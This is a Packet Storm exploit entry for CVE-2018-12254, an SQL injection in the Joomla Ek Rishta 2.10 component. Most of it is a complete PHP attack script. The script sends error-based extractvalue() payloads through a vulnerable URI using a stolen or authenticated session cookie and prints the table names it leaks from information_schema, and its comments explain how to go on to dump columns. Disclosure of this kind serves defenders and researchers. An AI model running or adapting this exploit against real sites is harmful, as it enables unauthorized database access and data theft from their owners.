Source: Packet Storm, PACKETSTORM:148189 (author: Guilherme Assmann)

Joomla Ek Rishta 2.10 SQL Injection

2018-06-14 00:00:00
Guilherme Assmann
packetstormsecurity.com

EPSS: 0.001 (Low), 48.6th percentile

`# Title: Joomla Component Ek Rishta 2.10 - SQL Injection  
# Date: 2018-06-14  
# Exploit Author: Guilherme Assmann  
# Vendor Homepage:https://www.joomla.org/  
# Version: 2.10  
# Tested on: MacOSX, Safari, Chrome  
# Download: https://extensions.joomla.org/extension/ek-rishta/  
# CVE: CVE-2018-12254  
  
# Vulnerability Description  
# Exploitation requires an authenticated session on the target (the injection  
# point is only reachable after login). The [username] segment of the  
# home/requested_user/Sent%20interest/[username] URI (read from PATH_INFO) is  
# placed in a SQL query without escaping, so a single quote breaks out of the  
# string; this script uses extractvalue()-based error extraction to read table names.  
# more information(en):   
# https://fireshellsecurity.team/cve-2018-12254-sql-injection-joomla-component/  
# more information(pt-br): https://m4k4br0.github.io/sql-injection-joomla-component/  
# more information: https://desecsecurity.com/  
# exploit code to dump tables:  
  
<?php  
  
// CVE-2018-12254  
  
// After dumping the table names, query columns by substituting the discovered name as a  
// backtick-quoted identifier: %60%23table_name%60 is the URL-encoded `#table_name` — the  
// backticks are required because a bare '#' would otherwise start a MySQL comment  
// (the payload below relies on exactly that to terminate the injected query).  
  
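// Usage: php exploit.php http://[HOST]/ "Cookie: foo=bar"
//
// The second argument is passed verbatim as an HTTP request header line, so it must be
// the full "Cookie: ..." header of an authenticated session — the injection point is only
// reachable after login. Missing arguments previously produced an "undefined index"
// notice and a request to an empty host; fail early with a usage message instead.
if (!isset($argv[1]) || !isset($argv[2])) {
    fwrite(STDERR, "Usage: php ".$argv[0]." http://[HOST]/ \"Cookie: foo=bar\"\n");
    exit(1);
}
$host = $argv[1];
$cookie = $argv[2];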
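// Probe the injection point once per URL produced by sqli() and print the table-name
// fragment that MySQL leaks through the extractvalue() XPath error message.
//
// $host   base URL of the target (scheme + host[+ path]); a trailing slash is tolerated
// $ck     full HTTP header line carrying the authenticated session, e.g. "Cookie: foo=bar"
// $marker substring that precedes the leaked name in the response; "#__" is what the
//         original probe searched for. NOTE(review): adjust if the target's error page
//         shows the real table prefix instead.
// $width  number of bytes echoed from the marker onwards. NOTE(review): MySQL truncates
//         extractvalue() error text to roughly 32 characters, so long names are cut short.
//
// Transport failures and responses without the marker are reported and skipped; the
// original passed strpos()'s false straight into substr() and printed the first 30 bytes
// of the page, which looked like a result but was not one.
function exploit($host, $ck, $marker = "#__", $width = 30){
    $urls = sqli();
    $ch = curl_init();
    // Options that do not change between requests are set once, outside the loop.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, ":)");
    curl_setopt($ch, CURLOPT_HTTPHEADER, [$ck]);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 100);
    curl_setopt($ch, CURLOPT_TIMEOUT, 100);
    // Every generated URI starts with "/", so strip a trailing slash from the host to
    // avoid "http://host//index.php".
    $base = rtrim($host, "/");
    foreach ($urls as $url) {
        curl_setopt($ch, CURLOPT_URL, $base.$url);
        $response = curl_exec($ch);
        if ($response === false) {
            echo "[!] request failed: ".curl_error($ch)."\n";
            continue;
        }
        $pos = strpos($response, $marker);
        if ($pos === false) {
            echo "[-] no '".$marker."' in response (no more rows, or the error is not reflected)\n";
            continue;
        }
        echo substr($response, $pos, $width)."\n";
    }
    curl_close($ch);
}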
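// Build the list of injected URIs, one per LIMIT offset into information_schema.tables
// for the current database. Each payload breaks out of the SQL string with a single
// quote, embeds the table name in an extractvalue() XPath error, and terminates the
// original query with '#'.
//
// $count number of offsets to generate (default 100, as in the original)
// Returns a list of URI paths (without scheme/host), already percent-encoded.
//
// Offsets now start at 0: the original generated LIMIT 1..100 and therefore never
// requested the first table of the schema.
function sqli($count = 100){
    $base = "/index.php/home/requested_user/Sent%20interest/1'or%20";
    $urls = [];
    for ($offset = 0; $offset < $count; $offset++) {
        $payload = 'extractvalue(0xa,concat(0xa,(select table_name from information_schema.tables where table_schema=database() limit '.$offset.',1))) #';
        // rawurlencode() emits %20 for spaces directly, which is what the original
        // achieved with urlencode() followed by replacing '+'.
        $urls[] = $base.rawurlencode($payload);
    }
    return $urls;
}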
exploit($host,$cookie);  // one request per LIMIT offset generated by sqli(); prints the leaked fragment of each response  
?>  
  
  
`
